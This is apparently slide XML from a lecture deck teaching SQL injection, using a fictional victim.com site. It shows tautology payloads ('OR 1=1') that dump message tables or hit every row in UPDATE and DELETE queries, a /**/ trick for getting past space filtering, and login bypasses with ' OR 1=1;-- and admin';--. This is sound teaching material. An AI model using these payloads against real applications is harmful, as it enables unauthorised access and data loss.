          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘Bob’ AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>old_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR ‘1’=‘1’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The attack would update every single password in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and users would not be able to log on!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Similarly, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>‘ OR ‘1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> injection in a DELETE query could delete all contents of the table!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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15962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0"/>
              <a:t>Injecting Numeric Values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="914400"/>
            <a:ext cx="8991600" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: Users can log in to Victim.com , access their profile and check messages sent to them by other users. Each user has a unique identifier or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/messages/list.aspx?uid=45</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When testing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter sending a single quote, we get the error:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unclosed quotation mark before the character string ‘ ORDER BY received;’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>To gain more information about the query we can send the request:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/messages/list.aspx?uid=0 having 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The response from the server is:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>messages.uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ is invalid in the select list because it is not contained in an aggregate function and there is no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> clause.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Based on this, the SQL code running on the server seems to be:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM messages </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=[USER ENTRY]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY received;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The method of exploitation in this scenario is to add an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>always true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) condition, so instead of returning only the messages for our user, all of them are displayed. The URL would be: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/messages/list.aspx?uid=45 or 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The result of the exploitation generated the following SQL statement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=45 or 1=1 /∗ Always true condition ∗/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY received;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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350838"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Tip</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1066801"/>
            <a:ext cx="8534400" cy="5059363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A defence technique consists of detecting and removing all spaces or truncating the value to the first space from the user entry. Multiline comments can be used to bypass such restrictions. Say you are exploiting an application using the following attack:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/messages/list.aspx?uid=45 or 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, the application removes the spaces and the SQL statement becomes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=45or1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This will not return the results you want, but you can add multiline comments with no content to avoid using spaces:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/messages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>list.aspx?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=45/∗∗/or/∗∗/1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The new query will not have spaces in the user input, but it will be valid, returning all of the rows in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>table.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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503238"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Terminating SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1447800"/>
            <a:ext cx="8610600" cy="3505200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Injection-terminating a SQL statement is a technique whereby the attacker injects SQL code and successfully ends the statement by commenting the rest of the query, which would be otherwise appended by the application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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29000" y="5181601"/>
            <a:ext cx="4724400" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:no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15962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Understanding How Web Applications Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1066800"/>
            <a:ext cx="8382000" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A user accesses a Web site by opening up a Web browser on their local machine. The Web site displays forms with fields and buttons that the user can use to input requests. The form resides on the Web server and is built using a combination of HTML and some scripting language (e.g., PHP). HTML organizes and formats the form, while the scripting language makes it interactive by correlating some type of action with its components (buttons and fields).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The scripting language residing on the Web server reacts to the user’s submission and passes the SQL statements to the application server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application server contains code that enforce business rules. They act as the interfaces to the database by managing the number of concurrent connections to the database as well as the Web content that is returned. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The database executes the query and returns the results to the application server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application server returns the results to the Web server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The scripting language, along with HTML, displays the results on the browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injections are deployed in the very beginning of this process. Lethal SQL code can be directly placed into user input fields and executed at the database.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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50838"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using Comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="990600"/>
            <a:ext cx="8763000" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We are going to use the authentication mechanism in the Victim Inc. administration Web site. We will only inject code into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> field and we will terminate the statement. We will inject the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ OR 1=1;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> which will create the following statement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘‘ OR 1=1;-- ‘ AND password = ’’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This statement will return all rows in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> condition. Moreover, it will ignore the part of the query after the comment, so we don’t have to worry about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>AND password=’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can also impersonate a known user by injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘admin’;-- ‘ AND password = ’’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This statement will return only one row containing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> user successfully bypassing the authentication mechanism.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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50838"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using Comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
